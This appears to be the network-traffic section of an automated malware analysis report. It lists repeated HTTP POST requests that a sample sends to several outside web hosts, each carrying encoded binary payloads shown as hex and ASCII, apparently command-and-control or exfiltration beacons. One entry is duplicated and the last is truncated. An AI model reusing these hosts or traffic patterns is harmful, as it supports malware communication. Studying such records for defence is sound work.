              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.otena.comCache-Control: no-cacheData Raw: 52 75 71 2b 64 68 45 70 41 4a 52 32 67 69 63 34 73 4d 39 32 30 32 70 6a 35 59 7a 50 37 31 68 4d 31 55 67 6e 70 72 71 4b 4b 70 62 78 53 4c 46 51 43 61 62 74 76 57 37 67 4e 51 38 78 64 6e 31 67 2f 35 43 77 67 6a 4c 66 37 42 2f 64 56 57 70 6f 78 57 70 62 4d 72 4b 77 47 58 36 2b 35 32 43 70 35 2b 38 48 55 7a 57 48 2b 77 69 63 66 2f 64 57 33 56 43 56 79 62 39 44 55 62 34 61 42 44 77 38 4f 6b 45 45 70 52 4c 75 4a 7a 6c 36 64 6a 63 4d 69 34 39 4c 57 32 48 64 48 4d 53 67 4d 64 32 48 5a 75 52 31 41 74 4e 57 6c 50 68 4c 69 62 6d 63 6b 33 43 31 6b 56 62 50 44 75 4f 53 44 34 66 6e 49 32 51 4c 54 2f 32 69 52 54 57 61 6a 5a 4c 4a 47 59 41 35 64 34 78 2b 7a 41 72 31 78 6b 32 48 4e 35 33 6c 56 6d 73 35 36 7a 4a 59 6b 47 6e 67 56 4d 66 38 45 6b 36 6a 51 2f 46 6a 74 66 49 77 71 6e 65 73 33 50 46 36 49 50 69 65 38 61 72 67 63 73 41 72 6d 49 43 38 2b 66 59 61 48 66 2f 66 61 36 45 71 4d 4a 4c 61 77 2f 50 58 41 42 57 45 6f 31 49 50 65 45 77 78 79 69 46 45 58 54 77 6f 78 7a 4d 65 7a 4b 34 49 4e 43 66 66 37 6b 38 74 6e 78 37 52 33 54 41 46 65 75 44 51 32 77 46 6d 52 4f 67 57 70 51 79 31 4e 46 35 47 34 53 61 50 48 67 62 6f 6c 43 38 41 5a 6b 75 37 58 34 41 76 37 48 59 38 55 66 77 52 35 4f 7a 78 2f 43 31 77 4f 53 41 58 68 75 74 6d 6b 62 77 53 6f 4e 4f 63 78 44 55 65 43 59 45 78 57 71 45 35 77 46 63 2f 77 6b 71 75 32 76 71 63 62 31 4d 71 57 61 70 4f 6f 72 34 67 57 66 4c 53 4f 6b 37 76 68 50 44 76 77 52 75 36 37 36 67 6f 50 32 67 5a 59 47 4d 55 54 33 71 78 30 6f 56 39 4f 67 74 67 4d 34 37 46 53 58 66 65 6e 77 6f 53 61 33 38 44 7a 36 5a 52 65 2b 45 49 69 6a 6e 76 44 50 6d 44 30 52 77 50 51 30 52 50 73 43 59 73 51 58 4c 49 73 37 56 7a 6a 6c 31 70 48 56 48 49 45 53 56 6b 55 44 75 52 67 6c 2b 32 74 47 37 39 72 6f 52 43 78 62 77 75 63 33 68 50 Data Ascii: Ruq+dhEpAJR2gic4sM9202pj5YzP71hM1UgnprqKKpbxSLFQCabtvW7gNQ8xdn1g/5CwgjLf7B/dVWpoxWpbMrKwGX6+52Cp5+8HUzWH+wicf/dW3VCVyb9DUb4aBDw8OkEEpRLuJzl6djcMi49LW2HdHMSgMd2HZuR1AtNWlPhLibmck3C1kVbPDuOSD4fnI2QLT/2iRTWajZLJGYA5d4x+zAr1xk2HN53lVms56zJYkGngVMf8Ek6jQ/FjtfIwqnes3PF6IPie8argcsArmIC8+fYaHf/fa6EqMJLaw/PXABWEo1IPeEwxyiFEXTwoxzMezK4INCff7k8tnx7R3TAFeuDQ2wFmROgWpQy1NF5G4SaPHgbolC8AZku7X4Av7HY8UfwR5Ozx/C1wOSAXhutmkbwSoNOcxDUeCYExWqE5wFc/wkqu2vqcb1MqWapOor4gWfLSOk7vhPDvwRu676goP2gZYGMUT3qx0oV9OgtgM47FSXfenwoSa38Dz6ZRe+EIijnvDPmD0RwPQ0RPsCYsQXLIs7Vzjl1pHVHIESVkUDuRgl+2tG79roRCxbwuc3hP
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nunomira.comCache-Control: no-cacheData Raw: 72 38 31 65 4a 32 6e 6c 42 5a 53 7a 70 42 36 38 4f 47 39 6b 67 59 4a 56 6e 72 73 48 2f 79 4a 6d 72 61 62 7a 38 35 4b 46 49 4e 76 68 51 44 4d 4f 65 37 6a 55 67 70 50 57 4d 42 7a 6d 44 50 37 69 35 44 44 57 5a 4d 41 48 44 54 57 56 30 63 6d 53 4b 55 35 57 43 65 56 5a 66 6b 76 70 53 53 65 77 35 55 62 75 6e 53 35 6e 48 33 71 4f 35 37 53 36 2b 2b 6d 6c 6a 59 6a 7a 30 4b 6b 36 4e 44 44 78 43 63 55 6c 5a 61 35 4c 74 32 2b 37 6e 79 34 4e 61 4c 79 51 71 32 73 38 63 57 6b 54 7a 77 37 34 75 68 67 78 4d 6b 55 5a 6b 4f 35 38 33 70 62 6d 77 4b 41 67 50 63 70 39 38 76 66 6f 73 4c 6f 59 78 64 38 48 5a 74 32 33 44 63 6c 34 71 6b 43 42 6f 4d 36 47 32 31 73 4a 47 43 55 59 50 57 77 61 63 50 6f 4e 73 76 39 4c 4d 45 44 7a 35 51 4f 5a 36 31 74 50 49 76 78 78 67 53 64 33 4f 58 70 44 52 62 43 71 67 51 51 56 52 44 44 39 38 46 50 4b 31 62 75 6c 43 34 6f 32 6e 58 64 76 50 67 72 55 58 6d 39 38 65 59 67 78 30 54 63 51 57 76 68 31 58 53 47 5a 56 34 54 47 61 39 41 61 52 74 57 70 4e 38 6a 70 2f 56 7a 4a 52 44 46 49 4d 32 64 33 64 46 56 4d 7a 61 76 31 76 4c 36 63 36 4f 78 4d 57 51 73 31 44 47 37 4a 2f 59 39 61 66 44 52 58 5a 37 54 47 52 72 70 5a 49 6d 67 33 39 39 31 31 6d 35 34 43 6b 63 62 30 31 39 6d 52 36 54 51 62 71 38 4e 70 7a 78 58 44 76 62 75 44 68 77 34 52 47 61 52 51 52 71 41 6a 65 6c 45 43 77 77 2f 58 44 56 44 69 30 54 59 2b 7a 4b 34 52 4e 73 4f 45 38 6a 34 43 57 6a 71 31 56 6d 6f 73 53 5a 41 6b 36 71 55 2f 76 66 47 78 59 45 30 48 71 6e 7a 6d 35 4b 39 39 49 55 77 4e 52 53 34 6b 33 66 4f 37 4a 6b 5a 61 70 74 74 4b 39 31 6e 53 57 61 34 36 58 4f 55 52 4d 59 36 73 56 70 6f 6a 69 67 51 79 71 43 46 6d 38 78 6e 72 48 68 2b 61 Data Ascii: r81eJ2nlBZSzpB68OG9kgYJVnrsH/yJmrabz85KFINvhQDMOe7jUgpPWMBzmDP7i5DDWZMAHDTWV0cmSKU5WCeVZfkvpSSew5UbunS5nH3qO57S6++mljYjz0Kk6NDDxCcUlZa5Lt2+7ny4NaLyQq2s8cWkTzw74uhgxMkUZkO583pbmwKAgPcp98vfosLoYxd8HZt23Dcl4qkCBoM6G21sJGCUYPWwacPoNsv9LMEDz5QOZ61tPIvxxgSd3OXpDRbCqgQQVRDD98FPK1bulC4o2nXdvPgrUXm98eYgx0TcQWvh1XSGZV4TGa9AaRtWpN8jp/VzJRDFIM2d3dFVMzav1vL6c6OxMWQs1DG7J/Y9afDRXZ7TGRrpZImg39911m54Ckcb019mR6TQbq8NpzxXDvbuDhw4RGaRQRqAjelECww/XDVDi0TY+zK4RNsOE8j4CWjq1VmosSZAk6qU/vfGxYE0Hqnzm5K99IUwNRS4k3fO7JkZapttK91nSWa46XOURMY6sVpojigQyqCFm8xnrHh+a
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mqs.com.brCache-Control: no-cacheCookie: _mcnc=1; __goc_session__=itstfzxkxoxpnauzzfcixwhstikzroxsData Raw: 57 44 6d 41 41 4d 6f 42 39 4a 4d 43 4a 47 61 52 4c 59 5a 44 4a 59 33 74 4f 53 35 36 6a 58 30 50 6e 6a 68 46 6d 43 66 38 69 37 30 69 37 76 75 46 79 6f 76 79 2b 30 6a 4f 74 2f 39 79 2b 7a 33 43 31 73 48 6d 2b 2f 70 6d 71 46 68 32 6c 4d 56 46 69 30 38 6f 47 4c 75 4c 2f 72 39 62 68 5a 79 47 6a 75 65 50 6e 4a 33 5a 77 67 6d 49 50 63 2f 63 67 65 33 52 69 41 37 72 76 6f 47 46 6c 64 2f 65 74 77 6d 74 4b 34 51 79 64 51 4e 30 41 57 76 69 71 2f 4d 52 78 73 72 66 74 48 2f 4e 47 4a 7a 61 42 45 48 71 30 59 2b 2b 6e 59 35 68 56 73 4b 63 7a 61 6e 38 2f 47 38 72 2b 6c 70 4c 72 75 6d 78 45 62 62 2b 58 47 35 51 79 47 75 56 61 68 30 2b 58 6d 4a 32 64 64 41 30 79 73 73 48 72 50 61 2f 70 71 78 30 4c 2b 70 75 64 42 71 4a 77 62 64 4a 4d 6e 70 46 33 4f 44 70 35 75 68 65 2f 50 39 6c 53 64 58 4f 48 47 52 72 79 76 74 2f 53 56 44 7a 47 34 71 52 35 58 33 64 38 54 6a 38 4a 37 7a 49 63 69 6f 64 6c 72 4f 46 4e 76 69 50 52 2f 72 6d 79 6e 44 33 49 65 34 43 68 45 50 72 33 45 66 59 46 36 74 45 68 6b 51 42 53 47 53 58 53 7a 35 4f 57 32 4a 34 4d 48 45 42 39 4c 2f 39 62 66 6f 68 79 7a 37 59 45 6c 77 70 64 59 53 75 56 45 33 34 56 6b 6c 78 6a 6b 6c 4e 5a 57 6e 73 7a 41 34 6f 57 43 44 74 72 64 6e 4a 67 71 75 32 49 42 7a 6a 64 6c 45 70 43 59 69 6e 57 72 43 4b 34 77 4c 4c 4d 61 4c 71 4a 33 69 48 46 33 41 50 74 51 73 6e 57 36 71 64 35 50 69 6e 2f 56 61 63 33 68 46 67 35 39 4d 49 5a 39 4d 54 59 58 63 78 6a 42 6b 2f 73 4c 63 52 61 76 34 4b 37 48 79 2b 73 52 67 56 2b 49 4f 63 42 44 34 78 50 32 4f 4d 41 39 35 72 6a 2f 44 68 6e 75 31 31 69 35 30 2b 67 62 54 43 73 41 71 56 6e 69 55 41 31 73 69 56 48 54 42 52 37 48 68 68 7a 43 4f 4d 4e 76 4e 43 69 42 70 39 49 42 63 41 63 37 4b 6a 75 72 39 77 69 73 32 38 31 61 44 35 70 71 37 72 78 58 4d 6f 68 50 54 73 43 52 4d 70 41 44 50 30 4d 61 33 58 51 44 67 3d Data Ascii: WDmAAMoB9JMCJGaRLYZDJY3tOS56jX0PnjhFmCf8i70i7vuFyovy+0jOt/9y+z3C1sHm+/pmqFh2lMVFi08oGLuL/r9bhZyGjuePnJ3ZwgmIPc/cge3RiA7rvoGFld/etwmtK4QydQN0AWviq/MRxsrftH/NGJzaBEHq0Y++nY5hVsKczan8/G8r+lpLrumxEbb+XG5QyGuVah0+XmJ2ddA0yssHrPa/pqx0L+pudBqJwbdJMnpF3ODp5uhe/P9lSdXOHGRryvt/SVDzG4qR5X3d8Tj8J7zIciodlrOFNviPR/rmynD3Ie4ChEPr3EfYF6tEhkQBSGSXSz5OW2J4MHEB9L/9bfohyz7YElwpdYSuVE34VklxjklNZWnszA4oWCDtrdnJgqu2IBzjdlEpCYinWrCK4wLLMaLqJ3iHF3APtQsnW6qd5Pin/Vac3hFg59MIZ9MTYXcxjBk/sLcRav4K7Hy+sRgV+IOcBD4xP2OMA95rj/Dhnu11i50+gbTCsAqVniUA1siVHTBR7HhhzCOMNvNCiBp9IBcAc7Kjur9wis281aD5pq7rxXMohPTsCRMpADP0Ma3XQDg=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.abart.plCache-Control: no-cacheData Raw: 33 74 71 36 4a 68 62 67 42 5a 53 58 33 44 4a 59 38 52 67 71 2b 72 6e 39 69 42 71 32 56 7a 38 6b 71 72 33 6e 66 2b 31 34 6c 6d 6c 2f 74 71 31 4f 37 78 33 58 50 78 6d 45 76 36 35 77 77 75 72 72 73 56 59 72 4c 59 70 6e 56 79 55 33 67 4f 78 62 66 32 30 35 63 6f 75 33 77 34 36 32 75 38 56 63 66 43 74 57 45 45 46 31 56 74 4a 71 37 37 57 53 39 62 67 66 33 4c 53 34 38 59 58 49 6e 55 62 53 38 58 47 43 39 49 52 34 4f 59 4c 32 4c 67 7a 43 2f 6c 50 34 79 34 65 6b 62 4b 6c 6c 57 66 39 70 6c 70 78 62 31 36 6e 4c 47 73 53 33 2f 53 47 74 2f 2b 65 59 41 73 79 30 73 4d 58 77 42 74 62 66 69 62 44 64 6a 63 76 73 43 46 51 49 59 2f 55 33 43 4f 33 76 4a 6d 77 56 2b 34 77 71 35 4b 53 34 42 64 5a 71 70 48 43 73 41 36 72 52 62 39 71 78 62 6c 4f 72 55 48 78 41 59 69 77 4a 47 51 6f 30 6d 4a 74 39 2f 5a 44 6f 2b 6d 61 46 30 6d 50 6a 4c 48 30 6f 39 64 56 6b 66 76 43 2f 68 63 4d 76 73 57 6b 71 59 57 62 63 7a 4c 63 34 67 69 37 42 66 62 4d 72 70 6a 46 36 68 69 73 4b 6c 58 56 77 4b 62 75 4c 37 47 47 70 45 51 76 34 31 75 48 34 45 6d 6a 64 50 52 46 71 69 65 44 33 69 71 55 49 56 51 42 61 43 6d 5a 43 2f 78 51 50 6d 30 57 67 69 37 51 72 34 62 53 66 37 66 36 6d 30 6a 63 61 77 41 65 39 49 66 63 42 44 54 49 42 49 55 74 4d 37 4f 65 4c 69 45 78 69 62 46 5a 35 71 78 2b 46 2b 2f 45 6a 2b 67 46 57 30 48 61 61 4e 68 4b 7a 41 63 38 4f 4b 57 58 70 58 68 54 74 68 57 78 6e 4f 4c 4a 61 46 52 43 54 45 70 6a 4c 39 5a 6f 4c 44 5a 5a 78 43 63 30 30 61 6b 43 6a 76 55 6c 64 42 4e 4a 34 6d 74 6f 58 4e 63 49 65 38 77 63 41 52 76 36 73 66 42 39 68 4a 4e 61 47 51 47 38 45 39 37 52 65 69 53 2b 57 67 66 74 5a 30 6c 75 31 63 66 5a 57 72 68 30 39 4b 72 5a 6f 34 30 71 31 2f 4f 69 58 50 51 2f 6e 43 56 76 33 6f 45 61 42 67 46 78 70 48 5a 78 65 35 5a 2f 67 44 50 47 67 4e 68 41 56 66 72 74 35 69 33 43 51 5a 66 67 3d Data Ascii: 3tq6JhbgBZSX3DJY8Rgq+rn9iBq2Vz8kqr3nf+14lml/tq1O7x3XPxmEv65wwurrsVYrLYpnVyU3gOxbf205cou3w462u8VcfCtWEEF1VtJq77WS9bgf3LS48YXInUbS8XGC9IR4OYL2LgzC/lP4y4ekbKllWf9plpxb16nLGsS3/SGt/+eYAsy0sMXwBtbfibDdjcvsCFQIY/U3CO3vJmwV+4wq5KS4BdZqpHCsA6rRb9qxblOrUHxAYiwJGQo0mJt9/ZDo+maF0mPjLH0o9dVkfvC/hcMvsWkqYWbczLc4gi7BfbMrpjF6hisKlXVwKbuL7GGpEQv41uH4EmjdPRFqieD3iqUIVQBaCmZC/xQPm0Wgi7Qr4bSf7f6m0jcawAe9IfcBDTIBIUtM7OeLiExibFZ5qx+F+/Ej+gFW0HaaNhKzAc8OKWXpXhTthWxnOLJaFRCTEpjL9ZoLDZZxCc00akCjvUldBNJ4mtoXNcIe8wcARv6sfB9hJNaGQG8E97ReiS+WgftZ0lu1cfZWrh09KrZo40q1/OiXPQ/nCVv3oEaBgFxpHZxe5Z/gDPGgNhAVfrt5i3CQZfg=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.hummer.huCache-Control: no-cacheData Raw: 7a 2b 44 36 57 38 6d 61 42 35 51 6d 30 64 70 4b 47 4f 55 65 35 75 4b 52 37 61 62 6e 6a 35 62 51 44 66 72 30 6d 54 73 43 63 35 7a 35 73 5a 4f 6e 71 50 63 39 6f 4d 58 30 77 65 6c 5a 48 63 4e 2b 35 57 52 65 4d 44 4b 50 6a 4b 4f 52 7a 64 34 5a 50 4e 65 2b 5a 36 70 4f 67 72 71 4b 32 38 4c 55 73 58 5a 64 70 70 4f 56 63 53 2f 43 72 77 4b 70 71 38 74 70 7a 4b 2b 37 71 7a 69 6d 74 4f 6b 75 67 79 70 59 68 58 32 56 6d 43 4e 65 75 6f 67 4c 36 61 4a 72 52 35 58 79 66 31 2b 6c 4b 4c 2b 71 6a 70 64 57 34 61 34 78 61 68 51 53 50 46 76 62 6a 4f 4d 52 36 58 52 6f 78 48 4d 32 68 76 49 56 42 49 49 78 61 76 52 56 49 78 45 4d 59 56 63 74 43 45 4e 4d 69 2f 2f 7a 4e 46 37 46 42 41 68 34 53 56 6c 5a 51 35 55 30 47 61 75 6b 70 7a 75 6a 5a 6e 6e 76 42 76 71 71 70 70 53 59 49 30 31 38 57 62 61 6e 70 50 4b 4c 38 5a 2f 38 67 5a 74 78 56 58 42 6e 6b 4a 54 57 6e 4e 42 70 71 43 53 4f 62 36 42 75 79 48 4f 51 6f 56 4a 47 70 77 74 52 35 4e 76 39 4c 58 46 4c 5a 50 44 61 34 6a 4c 37 6e 4f 66 50 72 46 46 4c 5a 39 48 44 35 7a 2f 31 74 6b 47 2f 2f 34 6c 4a 4f 37 53 66 70 58 73 42 76 69 78 48 71 37 4c 4f 66 78 5a 41 56 48 37 62 6c 31 56 6d 75 56 59 34 41 78 61 41 46 4c 65 32 2b 6f 51 36 49 79 75 52 4f 47 37 35 6c 38 41 71 62 51 51 61 6e 4e 36 5a 72 53 61 41 77 72 39 57 64 41 68 51 41 37 2f 47 46 39 71 6c 72 59 59 73 72 78 7a 4a 33 45 36 38 47 6a 2f 70 72 77 66 4e 74 41 71 36 6b 52 56 32 6f 4d 59 63 50 58 69 45 61 62 6b 32 7a 64 61 35 63 45 70 4c 36 6f 30 74 63 6d 68 54 69 4f 46 56 53 36 31 45 55 6e 36 6a 6e 44 49 79 47 4e 33 58 47 5a 5a 70 6d 6b 4e 37 72 72 55 61 68 76 51 79 33 39 74 6b 51 52 42 77 50 48 50 70 64 63 65 66 35 46 42 55 6f 33 68 46 68 4d 4d 71 44 6d 6b 44 58 53 6f 78 39 71 65 42 5a 4f 68 37 35 77 3d 3d Data Ascii: z+D6W8maB5Qm0dpKGOUe5uKR7abnj5bQDfr0mTsCc5z5sZOnqPc9oMX0welZHcN+5WReMDKPjKORzd4ZPNe+Z6pOgrqK28LUsXZdppOVcS/CrwKpq8tpzK+7qzimtOkugypYhX2VmCNeuogL6aJrR5Xyf1+lKL+qjpdW4a4xahQSPFvbjOMR6XRoxHM2hvIVBIIxavRVIxEMYVctCENMi//zNF7FBAh4SVlZQ5U0GaukpzujZnnvBvqqppSYI018WbanpPKL8Z/8gZtxVXBnkJTWnNBpqCSOb6BuyHOQoVJGpwtR5Nv9LXFLZPDa4jL7nOfPrFFLZ9HD5z/1tkG//4lJO7SfpXsBvixHq7LOfxZAVH7bl1VmuVY4AxaAFLe2+oQ6IyuROG75l8AqbQQanN6ZrSaAwr9WdAhQA7/GF9qlrYYsrxzJ3E68Gj/prwfNtAq6kRV2oMYcPXiEabk2zda5cEpL6o0tcmhTiOFVS61EUn6jnDIyGN3XGZZpmkN7rrUahvQy39tkQRBwPHPpdcef5FBUo3hFhMMqDmkDXSox9qeBZOh75w==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nunomira.comCache-Control: no-cacheData Raw: 72 38 31 65 4a 32 6e 6c 42 5a 53 7a 70 42 36 38 4f 47 39 6b 67 59 4a 56 6e 72 73 48 2f 79 4a 6d 72 61 62 7a 38 35 4b 46 49 4e 76 68 51 44 4d 4f 65 37 6a 55 67 70 50 57 4d 42 7a 6d 44 50 37 69 35 44 44 57 5a 4d 41 48 44 54 57 56 30 63 6d 53 4b 55 35 57 43 65 56 5a 66 6b 76 70 53 53 65 77 35 55 62 75 6e 53 35 6e 48 33 71 4f 35 37 53 36 2b 2b 6d 6c 6a 59 6a 7a 30 4b 6b 36 4e 44 44 78 43 63 55 6c 5a 61 35 4c 74 32 2b 37 6e 79 34 4e 61 4c 79 51 71 32 73 38 63 57 6b 54 7a 77 37 34 75 68 67 78 4d 6b 55 5a 6b 4f 35 38 33 70 62 6d 77 4b 41 67 50 63 70 39 38 76 66 6f 73 4c 6f 59 78 64 38 48 5a 74 32 33 44 63 6c 34 71 6b 43 42 6f 4d 36 47 32 31 73 4a 47 43 55 59 50 57 77 61 63 50 6f 4e 73 76 39 4c 4d 45 44 7a 35 51 4f 5a 36 31 74 50 49 76 78 78 67 53 64 33 4f 58 70 44 52 62 43 71 67 51 51 56 52 44 44 39 38 46 50 4b 31 62 75 6c 43 34 6f 32 6e 58 64 76 50 67 72 55 58 6d 39 38 65 59 67 78 30 54 63 51 57 76 68 31 58 53 47 5a 56 34 54 47 61 39 41 61 52 74 57 70 4e 38 6a 70 2f 56 7a 4a 52 44 46 49 4d 32 64 33 64 46 56 4d 7a 61 76 31 76 4c 36 63 36 4f 78 4d 57 51 73 31 44 47 37 4a 2f 59 39 61 66 44 52 58 5a 37 54 47 52 72 70 5a 49 6d 67 33 39 39 31 31 6d 35 34 43 6b 63 62 30 31 39 6d 52 36 54 51 62 71 38 4e 70 7a 78 58 44 76 62 75 44 68 77 34 52 47 61 52 51 52 71 41 6a 65 6c 45 43 77 77 2f 58 44 56 44 69 30 54 59 2b 7a 4b 34 52 4e 73 4f 45 38 6a 34 43 57 6a 71 31 56 6d 6f 73 53 5a 41 6b 36 71 55 2f 76 66 47 78 59 45 30 48 71 6e 7a 6d 35 4b 39 39 49 55 77 4e 52 53 34 6b 33 66 4f 37 4a 6b 5a 61 70 74 74 4b 39 31 6e 53 57 61 34 36 58 4f 55 52 4d 59 36 73 56 70 6f 6a 69 67 51 79 71 43 46 6d 38 78 6e 72 48 68 2b 61 Data Ascii: r81eJ2nlBZSzpB68OG9kgYJVnrsH/yJmrabz85KFINvhQDMOe7jUgpPWMBzmDP7i5DDWZMAHDTWV0cmSKU5WCeVZfkvpSSew5UbunS5nH3qO57S6++mljYjz0Kk6NDDxCcUlZa5Lt2+7ny4NaLyQq2s8cWkTzw74uhgxMkUZkO583pbmwKAgPcp98vfosLoYxd8HZt23Dcl4qkCBoM6G21sJGCUYPWwacPoNsv9LMEDz5QOZ61tPIvxxgSd3OXpDRbCqgQQVRDD98FPK1bulC4o2nXdvPgrUXm98eYgx0TcQWvh1XSGZV4TGa9AaRtWpN8jp/VzJRDFIM2d3dFVMzav1vL6c6OxMWQs1DG7J/Y9afDRXZ7TGRrpZImg39911m54Ckcb019mR6TQbq8NpzxXDvbuDhw4RGaRQRqAjelECww/XDVDi0TY+zK4RNsOE8j4CWjq1VmosSZAk6qU/vfGxYE0Hqnzm5K99IUwNRS4k3fO7JkZapttK91nSWa46XOURMY6sVpojigQyqCFm8xnrHh+a
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.t-tre.comCache-Control: no-cacheData Raw: 58 75 56 32 71 37 66 74 65 73 77 46 57 67 59 63 4a 75 39 43 30 41 44 5a 37 4f 4a 74 45 4e 47 45 32 37 79 5a 4d 38 77 75 4c 41 46 36 2b 71 6e 57 36 32 6e 5a 6f 46 71 78 78 56 64 41 6b 64 42 63 75 6a 42 4e 70 57 71 65 38 75 41 62 47 54 43 42 64 31 2f 35 62 34 79 6e 71 78 34 50 4f 45 4d 58 41 6a 44 33 63 64 6c 35 57 76 65 30 59 51 51 44 37 4f 6a 77 5a 70 74 38 6a 56 51 70 33 51 69 70 79 7a 34 44 67 4a 31 6f 76 53 47 41 41 63 57 79 2b 6f 64 2f 48 2f 74 32 52 4a 39 79 6e 71 69 58 58 37 78 6b 79 65 47 73 6c 6d 30 48 2f 56 43 75 78 51 63 6c 30 77 77 6c 62 64 70 73 73 5a 52 46 49 71 46 64 6e 33 33 46 4d 30 68 2b 6f 57 33 33 77 43 42 58 59 46 66 64 34 49 63 54 36 4b 6f 5a 77 6e 79 6f 72 61 4d 72 45 5a 59 6a 59 6c 65 2b 51 49 33 54 7a 62 77 66 47 79 66 32 79 76 70 4d 37 4b 31 53 31 43 4b 36 6e 56 30 77 5a 66 4c 42 7a 42 64 37 32 50 79 56 4b 2f 53 41 68 31 59 73 73 46 48 62 53 41 74 72 30 4b 68 4a 4a 49 37 4c 77 4d 2b 45 53 6b 39 4b 52 5a 77 4e 47 66 75 36 44 4a 2f 66 66 4e 4b 47 78 4a 39 32 42 57 43 33 57 65 42 74 46 75 63 68 47 69 71 7a 57 67 57 53 73 64 6b 75 53 6f 66 38 47 61 35 69 36 6c 39 32 67 4b 52 48 71 6d 6c 61 50 74 78 45 74 50 4c 42 35 63 79 67 6f 51 58 71 43 39 34 70 42 6e 61 50 4d 4f 77 4c 44 6d 32 42 68 6c 57 6d 52 52 55 5a 78 41 53 30 2b 4c 76 50 47 45 41 66 33 50 52 49 2f 52 37 51 79 48 44 43 4f 66 43 71 58 4d 37 51 48 74 39 6b 37 30 4b 31 42 45 75 67 38 42 49 44 51 48 43 5a 79 67 54 38 51 79 70 49 5a 75 70 65 72 48 63 6f 73 74 65 2b 53 66 31 75 5a 44 74 30 54 2f 4a 39 70 61 69 4a 42 46 6a 53 53 44 2f 41 5a 76 37 4a 77 2f 59 65 5a 39 70 36 63 39 4c 41 6b 78 4c 7a 69 77 58 33 4d 4f 61 58 6d 49 37 2b 7a 63 38 6f 4c 63 6b 71 39 4a 4b 79 6f 6a 31 39 45 67 3d 3d Data Ascii: XuV2q7fteswFWgYcJu9C0ADZ7OJtENGE27yZM8wuLAF6+qnW62nZoFqxxVdAkdBcujBNpWqe8uAbGTCBd1/5b4ynqx4POEMXAjD3cdl5Wve0YQQD7OjwZpt8jVQp3Qipyz4DgJ1ovSGAAcWy+od/H/t2RJ9ynqiXX7xkyeGslm0H/VCuxQcl0wwlbdpssZRFIqFdn33FM0h+oW33wCBXYFfd4IcT6KoZwnyoraMrEZYjYle+QI3TzbwfGyf2yvpM7K1S1CK6nV0wZfLBzBd72PyVK/SAh1YssFHbSAtr0KhJJI7LwM+ESk9KRZwNGfu6DJ/ffNKGxJ92BWC3WeBtFuchGiqzWgWSsdkuSof8Ga5i6l92gKRHqmlaPtxEtPLB5cygoQXqC94pBnaPMOwLDm2BhlWmRRUZxAS0+LvPGEAf3PRI/R7QyHDCOfCqXM7QHt9k70K1BEug8BIDQHCZygT8QypIZuperHcoste+Sf1uZDt0T/J9paiJBFjSSD/AZv7Jw/YeZ9p6c9LAkxLziwX3MOaXmI7+zc8oLckq9JKyoj19Eg==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.transsib.comCache-Control: no-cacheData Raw: 4d 62 42 64 30 61 39 71 43 35 51 69 78 33 6c 37 7a 68 69 63 75 4c 68 34 65 43 7a 46 6a 49 4e 37 55 77 31 72 5a 68 32 6f 30 6a 48 6f 74 61 39 41 31 49 76 71 4e 41 2b 59 38 65 76 58 31 52 72 33 33 61 4d 49 34 6c 50 69 36 57 6d 74 63 44 50 67 4a 4a 4f 54 4a 7a 6f 55 5a 39 66 4d 35 42 43 43 57 47 45 4f 4d 4c 35 6a 70 66 36 70 7a 4c 34 41 36 2b 59 6c 70 55 68 73 52 41 54 56 71 53 33 69 78 5a 49 6c 78 52 4c 67 4d 6d 6b 43 5a 7a 5a 46 31 42 75 6b 5a 6c 6e 49 4f 4f 74 39 57 7a 73 43 43 79 75 71 34 30 54 61 42 47 4b 32 35 44 54 61 43 37 72 68 50 71 61 53 53 54 45 39 6e 51 35 58 4e 44 45 49 43 55 4a 35 44 78 65 33 45 37 47 42 41 37 34 66 49 37 6f 30 78 38 5a 37 32 46 73 70 69 53 2f 53 33 4b 67 41 58 63 6f 59 2f 46 73 74 2f 79 78 4a 44 42 58 2f 78 67 39 39 66 61 70 41 42 32 78 50 61 2f 78 77 6c 39 46 42 50 73 38 72 6e 64 6b 2f 75 68 2f 67 4e 61 61 76 2b 4a 75 35 6d 75 35 69 38 74 55 73 58 61 39 4d 39 79 65 44 54 43 53 54 63 4f 76 43 6e 50 6a 74 51 50 2b 77 49 6a 6a 39 55 75 33 63 56 55 73 6d 73 6d 7a 6f 32 65 56 41 30 7a 59 6c 42 58 64 53 32 4b 6b 51 66 64 64 4c 71 6b 33 64 42 73 6f 2b 46 79 66 49 6a 79 75 73 6d 68 76 63 62 4b 47 53 4d 65 6a 56 61 63 36 75 4f 59 65 47 35 32 2f 63 56 71 56 4b 66 64 72 7a 61 35 66 42 64 56 54 6b 49 73 32 71 69 49 55 2b 67 76 50 74 68 2f 39 30 51 4d 55 66 30 4b 64 70 65 49 39 6f 6c 30 71 44 30 6e 72 57 36 42 39 72 57 31 36 65 49 56 59 62 7a 5a 36 4c 48 68 39 54 37 45 56 48 4c 65 74 63 63 57 50 34 34 57 7a 43 71 5a 67 6a 48 4f 75 30 69 61 